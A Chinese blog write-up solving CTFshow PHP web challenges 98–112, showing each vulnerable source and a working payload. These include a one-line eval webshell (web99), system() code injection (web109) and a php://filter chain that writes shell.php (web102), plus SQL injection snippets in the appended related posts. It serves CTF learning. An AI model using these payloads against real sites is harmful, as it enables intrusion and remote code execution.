CTFSHOW web入门刷题 web98-112

原创 已于 2023-12-31 12:00:35 修改 · 1.2k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

于 2023-12-31 11:53:13 首次发布
该博客围绕多个PHP代码题展开,涉及三元运算符、in_array()、parse_str等函数的使用。介绍了各题的源码、解题思路及对应Payload,如通过POST替换GET获取flag,利用函数特性绕过检查、进行弱类型比较等,还提及使用伪协议解决文件检测问题。
web98

源码:

 <?php
 include("flag.php");
 $_GET?$_GET=&$_POST:'flag';
 $_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
 $_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
 highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
 ?>

这道题用到了三元运算符

首先判断是否GET传入了数据,如果传入了则将POST的地址赋值给了GET

其实就是用POST替换GET

如果GET存在flag字段的值则会继续替换,最后替换成SERVER

这里我们只要GET随便传入一个数据让post替换get

然后post传入 HTTP_FLAG=flag

这样最后highlight_file就能去显示$flag

web99

源码:

 
<?php
 highlight_file(__FILE__);
 $allow = array();
 for ($i=36; $i < 0x36d; $i++) { 
     array_push($allow, rand(1,$i));
 }
 if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
     file_put_contents($_GET['n'], $_POST['content']);
 }
 ?>

  1. $allow = array();: 创建一个空数组 $allow

  2. for ($i=36; $i < 0x36d; $i++) { ... }: 这个循环从 36 到 0x36d(十进制为877)迭代,将 rand(1,$i) 生成的随机数添加到 $allow 数组中。

  3. if(isset($_GET['n']) && in_array($_GET['n'], $allow)){ ... }: 检查是否设置了 'n' 参数,并且该参数的值存在于 $allow 数组中。如果条件成立,就执行下一行的代码。

  4. file_put_contents($_GET['n'], $_POST['content']);: 将通过 POST 请求传递的 'content' 数据写入由 URL 中 'n' 参数指定的文件中。

In_array() 函数

定义:搜索数组中是否存在指定的值,如果在数组中找到值则返回 TRUE,否则返回 FALSE。

exp:

 
<?php
 $sites = array("Google", "Taobao", "Facebook");
  
 if (in_array("Google", $sites))
 {
     echo "找到匹配项!";
 }
 else
 {
     echo "没有找到匹配项!";
 }
 ?>

特性:

第三个参数没有设置的时候,为弱类型比较。例如比较 1.php 时会自动转换为 1 再比较。

本题思路:

使用get方法对传入php文件进行命名,post方法穿入一句话马来get webshell

payload:

get:?n=1.php

Post:content=<?=@eval($_POST['eval']);?>

web100

源码:

 
<?php
 highlight_file(__FILE__);
 include("ctfshow.php");
 //flag in class ctfshow;
 $ctfshow = new ctfshow();
 $v1=$_GET['v1'];
 $v2=$_GET['v2'];
 $v3=$_GET['v3'];
 $v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
 if($v0){
     if(!preg_match("/\;/", $v2)){
         if(preg_match("/\;/", $v3)){
             eval("$v2('ctfshow')$v3");
         }
     }
     
 }
 ?>

  1. $_GET['v1'], $_GET['v2'], $_GET['v3']: 获取通过GET请求传递的参数 v1、v2、v3 的值。

  2. $v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);: 检查 v1、v2、v3 是否都是数字,并将结果存储在变量 $v0 中。

  3. if($v0){: 如果上述数字检查通过,则进入此条件。

  4. if(!preg_match("/\;/", $v2)){: 如果变量 $v2 中不包含分号 ;,则进入此条件。

  5. if(preg_match("/\;/", $v3)){: 如果变量 $v3 中包含分号 ;,则进入此条件。

  6. eval("$v2('ctfshow')$v3");: 使用 eval 函数执行动态生成的字符串。这个字符串包含 $v2 函数名,参数是字符串 'ctfshow',然后连接上 $v3

这道题的关键在于

$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);

我们已知运算符优先级的排列如下

 &&  ||  =   and   or
 //从左往右,从高到低

所以这串代码检查仅对v1进行数字型检查,对v2以及v3没有影响

那么接下来就是传参来构造eval函数了

Payload:?v1=1&v2=var_dump($ctfshow)&v3=;

输出:

 object(ctfshow)#1 (3) { ["dalaoA"]=> NULL ["dalaoB"]=> NULL ["flag_is_0d8764100x2d4b030x2d40730x2da78a0x2d7fec68366b6b"]=> NULL }
 Fatal error: Uncaught Error: Function name must be a string in /var/www/html/index.php(24) : eval()'d code:1 Stack trace: #0 /var/www/html/index.php(24): eval() #1 {main} thrown in /var/www/html/index.php(24) : eval()'d code on line 1

 

直接输入flag发现错误,仔细查看发现0x2d多次出现,查询后发现0x2d为-,进行替换即可(结果这一步还是个非预期)

web101

源码:

 
<?php
 highlight_file(__FILE__);
 include("ctfshow.php");
 //flag in class ctfshow;
 $ctfshow = new ctfshow();
 $v1=$_GET['v1'];
 $v2=$_GET['v2'];
 $v3=$_GET['v3'];
 $v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
 if($v0){
     if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
         if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
             eval("$v2('ctfshow')$v3");
         }
     }    
 }
 ?>
 ​

由于过滤条件变多,于是上一道题的payload也随即失效

那么我们只需要找一个不包含上面任何过滤的命令即可

在这里对ctfshow文件进行序列化

payload:?v1=1&v2=echo(serialize(new%20ctfshow&v3=));

输出:

O:7:"ctfshow":3:{s:6:"dalaoA";N;s:6:"dalaoB";N;s:52:"flag_8fe215c70x2da8210x2d416e0x2d9a650x2deaa5ce47f60";N;}

还是一样的操作,把0x2d换成-

随后爆破最后一位flag,需要16次

web102

源码:

 <?php
 highlight_file(__FILE__);
 $v1 = $_POST['v1'];
 $v2 = $_GET['v2'];
 $v3 = $_GET['v3'];
 $v4 = is_numeric($v2) and is_numeric($v3);
 if($v4){
     $s = substr($v2,2);
     $str = call_user_func($v1,$s);
     echo $str;
     file_put_contents($v3,$str);
 }
 else{
     die('hacker');
 }
 ?>

  1. $v4 = (is_numeric($v2) and is_numeric($v3));。这意味着 $v4 将被赋值为布尔值,判断是否同时满足 $v2$v3 是数值。

  2. if($v4){ ... }: 如果 $v4 为真,即 $v2$v3 同时为数值类型,则执行以下代码块。

  3. $s = substr($v2,2);: 从 $v2 中截取从第三个字符开始的子字符串,并将结果赋给 $s

  4. $str = call_user_func($v1,$s);: 使用 call_user_func 函数调用 $v1 指定的回调函数,并将 $s 作为参数传递给该函数。将函数的返回值赋给变量 $str

  5. file_put_contents($v3,$str);: 将 $str 的值写入到以 $v3 命名的文件中。

  6. else{ die('hacker'); }: 如果 $v4 不为真,即 $v2$v3 不是数值类型,则终止程序执行。

首先我们对陌生函数进行一下解释

  1. substr() 字符串截取 exp:$s = substr($v2,2);截取从第三个字符开始的子字符串,过滤前两位

  2. call_user_func()调用方法或变量,第一个参数是调用的对象,第二个参数是被调用对象的参数

  3. file_put_contents($v3,$str); 用来写入文件,第一个参数是文件名,第二个参数是需要写进文件中的内容 文件名支持伪协议

已知call_user_func函数体中的$v1应为一个函数,那么v1赋值时应赋值一个方法

在函数$s = substr($v2,2);中不难得知变量v2的类型应该是一个字符串,并且由于上面is_numberic函数的限制,v2应该被赋值一个纯数字字符串,并且这个字符串的前面应该加上两个混淆字符以便函数体对方法进行正确调用

file_put_contents($v3,$str);,v3变量应该传入一个文件名,并且将变量str中的数据传入到被定义的文件中,v3变量可以使用伪协议进行构建

综上所述

构造payload

  1. v3=php://filter/write=convert.base64-decode/resource=shell.php

  2. v1=hex2bin

  3. v2--> <?=cat *; -base64->PD89YGNhdCAqYDs -hex(ascii)->115044383959474e6864434171594473-substr绕过->00115044383959474e6864434171594473

final

Get:?v2=00115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=shell.php

Post:v1=hex2bin

web103

同上

web104

源码:

 
<?php
 highlight_file(__FILE__);
 include("flag.php");
 ​
 if(isset($_POST['v1']) && isset($_GET['v2'])){
     $v1 = $_POST['v1'];
     $v2 = $_GET['v2'];
     if(sha1($v1)==sha1($v2)){
         echo $flag;
     }
 }
 ​
 ?>
 ​

直接sha1弱类型比较绕过

web105

源码:

 <?php
 highlight_file(__FILE__);
 include('flag.php');
 error_reporting(0);
 $error='你还想要flag嘛?';
 $suces='既然你想要那给你吧!';
 foreach($_GET as $key => $value){
     if($key==='error'){
         die("what are you doing?!");
     }
     $$key=$$value;
 }foreach($_POST as $key => $value){
     if($value==='flag'){
         die("what are you doing?!");
     }
     $$key=$$value;
 }
 if(!($_POST['flag']==$flag)){
     die($error);
 }
 echo "your are good".$flag."\n";
 die($suces);
 ​
 ?>

  1. $error='你还想要flag嘛?';: 将字符串赋值给变量$error

  2. $suces='既然你想要那给你吧!';: 将字符串赋值给变量$suces

  3. foreach($_GET as $key => $value){ ... }: 遍历$_GET数组中的所有键值对,将每个键值对的键和值分别赋给变量$key$value

  4. foreach($_POST as $key => $value){ ... }: 类似地,遍历$_POST数组中的所有键值对,将每个键值对的键和值分别赋给变量$key$value

  5. if($key==='error'){ die("what are you doing?!"); }: 如果在$_GET数组中找到一个键名为error,则输出错误消息并终止脚本。

  6. if($value==='flag'){ die("what are you doing?!"); }: 如果在$_POST数组中找到一个值为flag的键值对,则输出错误消息并终止脚本。

  7. $$key=$$value;: 使用覆盖变量的方式,将$value的值赋给与$key同名的变量

  8. if(!($_POST['flag']==$flag)){ die($error); }: 如果$_POST中的flag值不等于$flag,则输出错误消息并终止脚本。

因为if(!($_POST['flag']==$flag)){ die($error); },只要不成立就会输出$error,我们可以在GET把flag赋值给suces,然后再把suces赋值给error就能显示flag了

Payload:

Get:?suces=flag

Post:error=suces

web106

最简单的sha1绕过

web107

源码:

 <?php
 highlight_file(__FILE__);
 error_reporting(0);
 include("flag.php");
 ​
 if(isset($_POST['v1'])){
     $v1 = $_POST['v1'];
     $v3 = $_GET['v3'];
        parse_str($v1,$v2);
        if($v2['flag']==md5($v3)){
            echo $flag;
        }
 }
 ?>
parse_str

parse_str() 函数把查询字符串解析到变量中。

如果未设置 array 参数,则由该函数设置的变量将覆盖已存在的同名变量。

本题思路:

1、如果没有设置第二个参数,则解析后将赋值给同名变量。 2、parse_str(v1,v2),则会将v1解析后,放到v2变量里面。

只要满足v3的md5等于v2[flag]即可。可以传递给v3任意值,然后v1=flag=v3的md5值,这里选择让v3为数组类型从而使得md5值为空,v1=v2后md5也为空

Payload:

Post:v1=v2

Get:?v3[]=1

web108

源码:

 
<?php
 highlight_file(__FILE__);
 error_reporting(0);
 include("flag.php");
 ​
 if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
     die('error');
 ​
 }
 //只有36d的人才能看到flag
 if(intval(strrev($_GET['c']))==0x36d){
     echo $flag;
 }
 ​
 ?>
 error
strrev()

反转字符串

exp:strrev(string $string): string (返回 string 反转后的字符串)

解题思路:

由于正则匹配的原因所以不能直接向变量传入十六进制,所以将0x36d转换成10进制后得到877,因为strrev函数所以应该输入778

随后对ereg函数进行截断

首先传入一个符合正则表达式的匹配条件,随后使用%00对其进行null截断,再传入778

payload:?c=a%00778

web109
 
<?php
 highlight_file(__FILE__);
 error_reporting(0);
 if(isset($_GET['v1']) && isset($_GET['v2'])){
     $v1 = $_GET['v1'];
     $v2 = $_GET['v2'];
 ​
     if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
             eval("echo new $v1($v2());");
     }
 }
 ?>

可以看到我们即将要构造的函数是一个被实例化的对象,那么我们可以通过自行构建异常类型来执行system指令

Payload1:?v1=Exception&v2=system('ls')

这样函数体就变成了

eval("echo new Exception(system('ls')());");

输出:fl36dg.txt index.php

直接对flag进行读取即可

web110

源码:

 <?php
 highlight_file(__FILE__);
 error_reporting(0);
 if(isset($_GET['v1']) && isset($_GET['v2'])){
     $v1 = $_GET['v1'];
     $v2 = $_GET['v2'];
 ​
     if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
             die("error v1");
     }
     if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
             die("error v2");
     }
     eval("echo new $v1($v2());");
 }
 ?>

加入了很多的过滤条件

先来介绍两个新函数

FilesystemIterator

获取指定目录下的所有文件,用于构造新的文件系统迭代器

exp:$fileItr = new FilesystemIterator(dirname(__FILE__));

getcwd()

将当前工作目录的绝对路径复制

payload:

?v1=FilesystemIterator&v2=getcwd

可以得到对应flag所在的txt,直接读取即可

web111

源码:

 
<?php
 highlight_file(__FILE__);
 error_reporting(0);
 include("flag.php");
 ​
 function getFlag(&$v1,&$v2){
     eval("$$v1 = &$$v2;");
     var_dump($$v1);
 }
 ​
 ​
 if(isset($_GET['v1']) && isset($_GET['v2'])){
     $v1 = $_GET['v1'];
     $v2 = $_GET['v2'];
 ​
     if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
             die("error v1");
     }
     if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
             die("error v2");
     }
     
     if(preg_match('/ctfshow/', $v1)){
             getFlag($v1,$v2);
     }
 }
 ?>

新函数:

GLOBALS

引用全局作用域中可用的php超全局变量,一个包含了全部变量的全局组合数组。变量的名字就是数组的键。

Payload

?v1=ctfshow&v2=GLOBALS

web112

源码:

 <?php
 highlight_file(__FILE__);
 error_reporting(0);
 function filter($file){
     if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
         die("hacker!");
     }else{
         return $file;
     }
 }
 $file=$_GET['file'];
 if(! is_file($file)){
     highlight_file(filter($file));
 }else{
     echo "hacker!";
 }

is_file — 判断给定文件名是否为一个正常的文件 exp:is_file ( string $filename ) : bool

这道题我们需要能让is_file检测出是文件,并且 highlight_file可以识别为文件。

这时候可以利用php伪协议。

payload:file=php://filter/resource=flag.php

CTFshow php特性 web98
Kradress的博客
12-14 926
目录源码思路解总结 源码 Notice: Undefined index: flag in /var/www/html/index.php on line 15 Notice: Undefined index: flag in /var/www/html/index.php on line 16 Notice: Undefined index: HTTP_FLAG in /var/www/html/index.php on line 17 <?php /* # -*- coding: ut
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 6549
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
CTFshow系列——PHP特性Web97-100
最新发布
m0_73812072的博客
09-07 1017
OK,今天晚上也是给大家带来一篇PHP特性的CTF目。主要是昨天参加了第三届”陇剑杯“比赛,所以也是没有给大家及时的更新; 过几天就把这次比赛的Web以及应急响应的两道目给大家讲解一下。
ctfshow web89-web98php特性篇)
2403_88003384的博客
07-01 501
这里的特性主要是正则的修饰符/m,没有这歌修饰符就是^和$就会老老实实的匹配开头和结尾,有了之后就会识别行的出现,即在每个换行符前或后开始匹配,说白了就是多行模式!这里用火狐的hackbar打不了原因是火狐的hackbar的机制会对你上传的东西进行一次编码也就导致如果我上传的是已经编码了的数据就会再次编码导致不行!4476的8进制是10574然后再在前面添0即可!md5的强比较这里可以用数组绕过,机制是因为md遇到数值返回null,但是这里我想用md5的碰撞,这里我积累过一对可以打的碰撞!
ctfshow web93-98
qq_73722777的博客
08-07 1024
打开环境是一个代码审计目简单分析就是输入一个变量num,其值不能等于4476与包含字母,但是他的值需要为4476函数intval作用为获取变量的整数值,第二个参数的意思是进制,默认为10进制。目参数为0,就根据变量类型进行判别但是只能识别10,16,8三种类型由于目过滤了10进制的4476与16进制的x,我们可以用八进制进行绕过即010574(0为标识符)?num=010574得到flag,此结束。
CTFshow web入门web98-php10
weixin_74336671的博客
11-23 181
如果存在get传参,则把post传参地址给get,可以简单理解为post覆盖了get。的值为flag,就读取文件,也就是输出flag。通过分析可知,此处使用的是三目运算符,
ctfshow-web98(php特性)
m0_62094846的博客
01-14 641
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 21:39:27 # @link: https://ctfer.com */ include("flag.php"); $_GET?$_GET=&$_POST:'flag'; $_GET['flag']==.
ctfshow web入门记录-信息收集
m0_55754984的博客
10-12 1507
右键查看源代码 JS前台拦截--无效访问 view-source f12查看请求头和响应头 可以查看robots.txt 可以查看index.phps文件 phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。 www.zip/rar/tar.gz源码泄露 readme.md Git源码泄露,使用.git/查询 开发人员会使用 git 进行版本控制,对站点自动部署。但如果配置不当.
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1433
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
ctfshow-xxs-316-333-wp
2301_80915592的博客
03-15 1084
316.反射型 XSS(-326都是反射型)js恶意代码是存在于某个参数中,通过url后缀进行get传入,当其他用户点进这个被精心构造的url链接时,恶意代码就会被解析,从而盗取用户信息。来看,先简单测试一下是xxs直接注入(代码意思是浏览器解析这段代码时,会弹出一个警告对话框,显示当前网页的所有 Cookie 信息)弹出flag=你不是管理员。显然,由于我们不是管理员,所以cookie参数是不正确的。
面试必备
12-18
最新的传智播客web前端面试总结,复习web知识,查漏补缺必备
[ctfshow web入门] web6 目录爆破
qq_50332504的博客
04-05 784
还记得之前说过网站的入口的吗,我们输入url/xxx,其中如果xxx存在,那么证明存在这样是个入口点。所以我们可以通过遍历url/xxx,xxx设置为变量,那么理论上就能获取网站的所有入口点。但是这是不现实的,假设每秒可以访问100次,那么我们爆破出所有xxx长度等于5的入口点需要 0-9 a-z 也就是(10+26)^5种可能 / 100(次/秒) / 60秒 / 60分钟 / 24小时 约等于 7天。所以我们需要字典。
ctfshow-web-web15 Fishman
2401_84254087的博客
04-26 550
【代码】ctfshow-web-web15 Fishman。
web
LL123412138的博客
08-11 213
WarmUp 查看源文件,提示了source.php,那我们就去看看source.php有什么东西。 /source.php 一堆代码,我们慢慢看,很明显,有一个emm的类,类里面有一个checkFile函数,需要传入一个参数page,并返回布尔值。接下来简单了解一些基本函数。 isset:判断是否为空 in_array:判断是否在数组中 mb_substr:获取字符串的指定字段 mb_strpos:获取指定字符出现在字符串的位置 is_string:判断是否全为字符 来,我们再来看看这段程序。 程序获
ctfshow web入门 php特性web98-102
m0_62207170的博客
06-24 1071
ctfshow web入门 php特性web98-102
ctfshow学习记录-web入门php特性89-98
龟速更新的九某人
07-12 1008
ctfshow学习记录-web入门php特性web89-web98
ctfshow-web入门-php特性(web96-web99)
Welcome To Myon'Blog !
07-13 1874
如果 $_GET 不为空,也就是说我们进行了 get 传参,那么就会通过 $_GET = &$_POST 将 $_POST 的引用赋值给 $_GET,引用赋值导致两个变量指向同一个内存地址,而 $_POST 变量内容改变会影响 $_GET 变量的内容;$_GET 变量是一个数组,预定义的 $_GET 变量用于收集来自 method="get" 的表单中的值,表单域的名称会自动成为 $_GET 数组中的键。isset()函数用于检查变量是否设置,如果设置了,则 id=$_GET['id'],否则 id=1。
Bugku--WEB
chenmou40的博客
06-16 621
1.Simple_SSTI_1 解法: 在URL中构造 ?flag={{config.SECRET_KEY}} 审: 相关知识点: Python沙盒绕过 模板注入(STTI) 模板引擎(STT) 2.Simple_SSTI_1 解: 1.工具:tqlmap 2.手工 3.Flask_FileUpload 解法: 创建一个文件,写python代码,修改文件格式为 .jpg import os os.system('cat /flag') 修改文件格式方法自行搜索 审: <!-- Give m.
BUUCTF-web
m0_65853019的博客
03-26 1005
ffffllllaaaagggg,打开文件之后发现没有什么关键信息,应该是键入的路径不对,但是我们不清楚它的具体位置,所以用5次../返回,即键入source.php?file=php://filter/read=convert.base64-encode/resource=flag.php,打开文件后得到伪代码,使用工具进行解码得到源代码,即。从带有GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送的信息量也有限制(最多 100 个字符)127.0.0.1;
ctfshow web入门 web35
03-29
### CTFShow Web 入门 Web35 的解思路 CTFShow 平台中的 Web 类别目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手分析并尝试解决。 #### 目背景与目标 Web35 是一个典型的基于 GET 请求参数的注入类目[^1]。通过访问页面可以发现存在动态加载的内容或者查询功能,这表明可能存在未经过滤的输入点用于执行恶意操作。具体来说,该目的核心在于利用 URL 参数构造特定请求来绕过验证机制获取隐藏数据。 #### 技术要点解析 - **SQL Injection Basics**: 如果怀疑有 SQL 注射风险,则应测试各种特殊字符组合如 `'`, `"`, `--` 和其他可能影响语句逻辑的部分。当遇到错误反馈时更需注意调整payload试探数据库版本及结构信息。 ```sql ' OR '1'='1 -- ``` 上述代码片段展示了如何构建简单的布尔型盲注 payload 来改变原始查询条件从而达到控制结果集的目的。 - **Error-Based Exploitation**: 尝试触发异常响应以暴露更多关于内部工作流程的信息。某些情况下服务器会返回详细的错误描述有助于进一步确认假设方向正确与否。 - **Union Select Technique**: 当得知列数匹配情况之后可采用 union select 方法读取额外字段内容直至找到敏感资料为止。 ```sql ?param=1 UNION SELECT null,version(),database() ``` 此段示例说明了怎样运用union select技术从不同表里提取有用情报同时保持整体语法有效性的方法。 综上所述,在处理此类问过程中要灵活应用多种技巧相互配合才能顺利通关。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值